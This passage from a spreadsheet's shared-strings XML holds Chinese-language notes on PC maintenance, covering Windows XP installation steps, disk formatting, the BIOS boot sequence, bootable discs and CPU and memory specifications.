    <t>B</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>step 4.</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF323E32"/>
        <rFont val="Simsun"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> 进入xp，先装杀毒软件。</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>强烈推荐诺顿企业版，我用的是8.1，防毒能力超高，占用资源少，自动线上更新病毒库，而且没有时效限制。</t>
  </si>
  <si>
    <t>d盘作为下载盘，因为下载产生非常多的碎片，单独一个区可以方便碎片整理；而且下载会使坏道出现的几率大大增加，所以这样可以防止坏道扩散而影响其他有用的文档。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>step 9.</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF323E32"/>
        <rFont val="Simsun"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>在e盘设一个文件夹“My Documents”，然后把桌面上的“我的文档”的位置改成e盘的这个目录下，这样即便c盘崩溃，也不会影响到文档文件夹。</t>
  </si>
  <si>
    <r>
      <t>step 14.</t>
    </r>
    <r>
      <rPr>
        <b/>
        <u/>
        <sz val="12"/>
        <color rgb="FF323E32"/>
        <rFont val="Simsun"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> 将所有下载软件的下载目录设置到d盘。</t>
    </r>
  </si>
  <si>
    <r>
      <t>  两种都是高级格式化即High level Format,两者的区别在于快速格式化</t>
    </r>
    <r>
      <rPr>
        <b/>
        <u/>
        <sz val="12"/>
        <color rgb="FF323E32"/>
        <rFont val="Simsun"/>
        <charset val="134"/>
      </rPr>
      <t>仅仅是清掉FAT表（文件分配表）</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF323E32"/>
        <rFont val="Simsun"/>
        <charset val="134"/>
      </rPr>
      <t>，使系统认为盘上没有文件了，并不真正格式化全部硬盘，快速格式化后可以通过工具恢复硬盘数据，快速格式化的速度要快的多就是这个原因。不选快速格式化，普通格式化程序会将硬盘上的所有磁道扫描一遍，清除硬盘上的所有内容，不可恢复，普通格式化可以检测出硬盘上的坏道，速度会慢一些。</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>  一般来说，可以选择快速格式化，速度快一点。如果你怀疑硬盘有坏道，可以试用普通格式化。 快速格式化只是删除了硬盘上的文件，</t>
    </r>
    <r>
      <rPr>
        <b/>
        <u/>
        <sz val="12"/>
        <color rgb="FF323E32"/>
        <rFont val="Simsun"/>
        <charset val="134"/>
      </rPr>
      <t>完全格式化是真正的将硬盘重新分道分簇。</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>  一般来说，快速格式化比完全格式化要好，因为一方面可以以很快的速度格式化完成，另外一方面</t>
    </r>
    <r>
      <rPr>
        <b/>
        <u/>
        <sz val="12"/>
        <color rgb="FF323E32"/>
        <rFont val="Simsun"/>
        <charset val="134"/>
      </rPr>
      <t>对硬盘的磨损要少。</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF323E32"/>
        <rFont val="Simsun"/>
        <charset val="134"/>
      </rPr>
      <t>但是如果怀疑硬盘上可能有坏道的话，就应该进行完全格式化对硬盘进行一次完全的扫描，完全格式化会对硬盘上的坏道作标记防止后续的使用，可以在一定程度上提高有坏道硬盘的使用</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>　　自检通过后，</t>
    </r>
    <r>
      <rPr>
        <b/>
        <u/>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统</t>
    </r>
    <r>
      <rPr>
        <b/>
        <u/>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>BIOS</t>
    </r>
    <r>
      <rPr>
        <b/>
        <u/>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>将查找显示卡的</t>
    </r>
    <r>
      <rPr>
        <b/>
        <u/>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>BIOS</t>
    </r>
    <r>
      <rPr>
        <b/>
        <u/>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，由显卡</t>
    </r>
    <r>
      <rPr>
        <b/>
        <u/>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>BIOS</t>
    </r>
    <r>
      <rPr>
        <b/>
        <u/>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>来完成显示卡的初始化，显示器开始有显示</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，自此，系统就具备了最基本的运行条件，可以对主板上的其它部分进行诊断和测试，再发现故障时，屏幕上会有提示，但一般不死机，接着系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>BIOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>将检测</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的类型和工作频率，然后开始测试主机所有的内存容量，内存测试通过之后，系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>BIOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>将开始检测系统中安装的一些标准硬件设备，这些设备包括：硬盘、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CD</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>－</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ROM</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、软驱、串行接口和并行接口等连接的设备，大多数新版本的系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>BIOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>在这一过程中还要自动检测和设置内存的相关参数、硬盘参数和访问模式等。　　</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <b/>
        <u/>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标准设备检测完毕后，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>BIOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内部的支持即插即用的代码将开始检测和配置系统中已安装的即插即用设备。每找到一个设备之后，系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>BIOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>都会在屏幕上显示出设备的名称和型号等信息，同时为该设备分配中断、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DMA</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通道和</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>I/O</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端口等资源。最后系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>BIOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>将更新</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ESCD(Extended System Configuration Data</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，扩展系统配置数据</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>。</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ESCD</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>数据更新完毕后，系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>BIOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的启动代码将进行它的最后一项工作，即根据用户指定的启动顺序从软盘、硬盘或光驱启动。　　</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <b/>
        <u/>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>现象六：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>硬盘可以引导，但</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Windows</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不能正常启动，也不能进入安全模式。这种情况表明</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Windows 98</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>出现了严重的错误，首先，用杀毒软件查杀病毒，看是不是病毒造成的，如果没有发现病毒可以用以下方法试一试。</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　　</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>这个目录对应的是对文件使用"发送到"命令时的"目的地"。你可以在里面为常用的文件夹添加快捷方式，以后再复制文件时就不必抓着鼠标到处找了。C:\Users\wwu\AppData\Roaming\Microsoft\Windows\send to;如果右键---发送到找不到需要的项目，可以在此文件夹（属隐藏文件夹）新建；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>恢复win7的quick launch</t>
  </si>
  <si>
    <t>恢复win7的quick launch</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3 右击任务栏，取消勾选：“锁定任务栏”</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 这时在任务栏右端会出现一个launch图标，</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>6 此时可以锁定任务任，放入图标；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>可启动光盘</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>　　以从</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>C</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘启动为例，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>BIOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>将读取并执行硬盘上的主引导记录</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，主引导记录接着从分区表中找到第一个活动分区，然后读取并执行这个活动分区的分区引导记录，</t>
    </r>
    <r>
      <rPr>
        <b/>
        <u/>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>而分区引导记录将负责读取并执行</t>
    </r>
    <r>
      <rPr>
        <b/>
        <u/>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IO.SYS</t>
    </r>
    <r>
      <rPr>
        <b/>
        <u/>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>这是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Windows</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>最基本的系统文件。</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IO.SYS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>首先要初始化一些重要的系统数据，然后就显示出我们熟悉的蓝天白云，在这幅画面之下，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Windows</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>将继续进行</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部分和</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>GUI(</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>图形用户界面</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部分的引导和初始化工作，一切顺利结束，电脑正常启动。</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>是指带有引导文件的光盘。使用可启动光盘启动计算机时，计算机的BIOS程序首先会检查光盘的第17个扇区，如果发现其中包含</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>启动记录卷描述表</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>（boot record volume descripter),就会根据表中的地址继续查找</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>启动目录</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>（booting catalog),找到启动目录后，再根据目录指示的启动入口（boot entry),找到相应的</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>启动引导文件</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>，然后读取其中的数据完成启动引导过程。</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Windows虽然也带着启动程序，但体积很大，需安装到硬盘后才可以启动；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>windows PE(Preinstallation Environment),是一个集中了windows核心功能的Mini OS，能够直接从光盘启动；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>当</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>windows</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统进不去时，可用启动盘将系统启动到</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，利用启动盘的程序文件对硬盘分区，再格式化，然后再放入</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>windows</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统盘，在</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下访问光驱，运行安装命令；</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CPU</t>
  </si>
  <si>
    <t>1 CPU结构</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CPU基板</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>承载CPU内核的PCB板</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CPU核心</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>位于基板中间由单晶硅做成的长方形或CPU模块固化；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CPU封装</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>采用特殊材料将CPU芯片或CPU模块固化；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CPU接口</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>是CPU中间上亿个晶体管连接的外部电路元件，是CPU与主板交换数据的通道，插针式的CPU同时可以把CPU固定在插座上，我们俗称的939,775指的是CPU的针脚或触角数；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CPU缺角</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>是CPU安装方向的标识，与主板CPU插槽上的标识对应；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 CPU性能指标</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>频率</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>核心类型</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>针脚数</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>制程工艺</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>倍频</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>前端总线</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统总线</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>二级缓存</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>额定电压</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Inter Core 2 Duo E63007)</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.86GHz,计算能力；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>A男</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>775pin</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>65nm,系统元件越小，在相同尺寸的芯片上就可以增加更多的元器件，通常以纳米来衡量组成芯片、电子线路或元件的细致程度；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1066MHz,Intel FSB频率＝外频*4,AMD FSB频率＝外频*2,是传输能力；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>266MHz</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2MB,目前所有的L1 cache都基本相同；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.248V;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3 CPU的封装工艺：有10多种；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Plastic Pin Grid Array:塑料栅格阵列；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CPGA Geramic PGA:陶瓷封装；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>OPGA Organic PGA:有机管脚阵列；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LGA Land GA;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>可启动光盘 硬盘 恢复盘 启动盘</t>
  </si>
  <si>
    <t>可启动光盘 硬盘 恢复盘 启动盘</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统安装</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>硬件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>内存</t>
  </si>
  <si>
    <t>内存</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 内存的组成</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 内存分类</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SDRAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DDR</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DDR2</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>时钟频率与数据传输率</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>电压</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1:2(2倍预取2-bit Prefetch)</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1:4(4倍预取）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.5-2.8v</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.8v</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3 内存总线频率与CPU FSB频率的匹配</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>FSB800MHz的CPU：2个DDR400；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PCB印刷线路板：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>是内存颗粒固定和连接外部电路的基板，常见的是4层或6层PCB板；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>内存颗粒</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>内在颗粒封装方式</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>内存接口</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>内存的核心元件；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>目前主流的是BGA封装方式</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>金手指，由众多金黄色的导电触片组成；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>硬盘</t>
  </si>
  <si>
    <t>1 性能指标</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 硬盘构成</t>
